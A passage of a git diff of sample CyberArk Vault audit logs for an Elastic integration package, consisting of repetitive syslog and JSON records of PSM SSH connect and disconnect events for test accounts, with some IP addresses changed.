06:49:37\n 2021-03-14T13:49:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 
06:49:37","IsoTimestamp":"2021-03-14T13:49:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-14T13:50:43Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:50:43\n 2021-03-14T13:50:43Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:50:43","IsoTimestamp":"2021-03-14T13:50:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:31:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:31:56\n 2021-03-15T10:31:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:56","IsoTimestamp":"2021-03-15T10:31:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:33:39Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:39\n 2021-03-15T10:33:39Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n 
Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:39","IsoTimestamp":"2021-03-15T10:33:39Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:35:00Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:00\n 2021-03-15T10:35:00Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:00","IsoTimestamp":"2021-03-15T10:35:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:18:31Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:18:31\n 2021-03-15T13:18:31Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 
06:18:31","IsoTimestamp":"2021-03-15T13:18:31Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.13;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:06Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:06\n 2021-03-15T14:08:06Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-67.43.156.15-adrian\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:06","IsoTimestamp":"2021-03-15T14:08:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
System-UnixSSHKeys-67.43.156.15-adrian","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f5725611-ca57-4a2a-a089-f45b3174a358;SrcHost=67.43.156.13;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:08:28Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:08:28\n 2021-03-15T14:08:28Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:08:28","IsoTimestamp":"2021-03-15T14:08:28Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=7db90436-8a1a-4203-9a96-65137625ab2d;SrcHost=67.43.156.13;User=testark;","Message":"PSM 
Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-15T14:11:09Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:09\n 2021-03-15T14:11:09Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:09","IsoTimestamp":"2021-03-15T14:11:09Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating 
System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-16T10:04:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 16 03:04:51\n 2021-03-16T10:04:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 16 03:04:51","IsoTimestamp":"2021-03-16T10:04:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM 
Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b222ac9-c2ad-49ea-9c4e-6829940f58d4;SrcHost=67.43.156.13;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"4"},{"Name":"LastFailDate","Value":"1615888216"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/302_psm_disconnect.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/302_psm_disconnect.log index c172f644c9f..06567eb4180 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/302_psm_disconnect.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/302_psm_disconnect.log 
@@ -1,16 +1,16 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\n 10.2.0.7\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"302","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionDuration=00:00:07;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}} -<5>1 2021-03-11T17:38:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:26\n 2021-03-11T17:38:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:26","IsoTimestamp":"2021-03-11T17:38:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:13;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:47:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:47:01\n 2021-03-11T17:47:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
09:47:01","IsoTimestamp":"2021-03-11T17:47:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:11;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:48:40Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:40\n 2021-03-11T17:48:40Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:40","IsoTimestamp":"2021-03-11T17:48:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating 
System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Disconnect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:55:02Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:55:02\n 2021-03-11T17:55:02Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 302\n PSM Disconnect\n Info\n Administrator\n PSM Disconnect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Disconnect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:55:02","IsoTimestamp":"2021-03-11T17:55:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"302","Desc":"PSM Disconnect","Severity":"Info","Issuer":"Administrator","Action":"PSM Disconnect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionDuration=00:00:12;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM 
